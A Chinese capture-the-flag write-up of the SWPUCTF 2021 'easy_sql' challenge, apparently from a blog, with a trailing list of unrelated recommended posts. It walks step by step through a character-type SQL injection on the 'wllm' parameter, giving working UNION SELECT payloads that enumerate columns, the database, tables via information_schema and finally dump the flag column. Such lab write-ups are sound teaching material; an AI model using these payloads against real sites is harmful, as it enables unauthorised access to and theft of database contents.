字符型注入([SWPUCTF 2021 新生赛]easy_sql)

拿到题目,查看源码,可知是要输入参数wllm。

输入参数/?wllm=1,得到会显

继续输入参数/?wllm=1',报错,确定为字符型漏洞

1.查看字段列表,发现在字段4报错,确定为3列

复制代码
?wllm=-1' order by 3--+
?wllm=-1' order by 4--+

2.查看回显

复制代码
?wllm=-1' union select 1,2,3--+

3.查询数据库名(test_db)

复制代码
?wllm=-1' union select 1,2,database()--+

4.查看test_db库的表(users)

复制代码
?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+

5.查询字段

复制代码
?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+

6.出现flag字段,查看flag字段的内容

复制代码
/?wllm=-1' union select 1,2,group_concat(id,flag) from test_tb--+ 

出现flag字段,成功解出

相关推荐
世界尽头与你21 分钟前
CVE-2022-46463 Harbor public 镜像仓库信息泄露
安全·网络安全·渗透测试
Wang's Blog29 分钟前
MongoDB小课堂: 文档操作核心技术指南:主键机制、CRUD操作与最佳实践
数据库·mongodb
g***26791 小时前
最新SQL Server 2022保姆级安装教程【附安装包】
数据库·性能优化
5***o5001 小时前
PHP在电商中的支付集成
sql·ue5·rizomuv
十里-2 小时前
前端监控1-数据上报
前端·安全
风123456789~2 小时前
【OceanBase专栏】OB背景知识
数据库·笔记·oceanbase
4***72132 小时前
【玩转全栈】----Django模板语法、请求与响应
数据库·python·django
c***42102 小时前
Django视图与URLs路由详解
数据库·django·sqlite
数据库学啊2 小时前
团队小希望运维简单,时序数据库选型有什么推荐?
运维·数据库·时序数据库
2***65633 小时前
数据库操作与数据管理——Rust 与 SQLite 的集成
数据库·rust·sqlite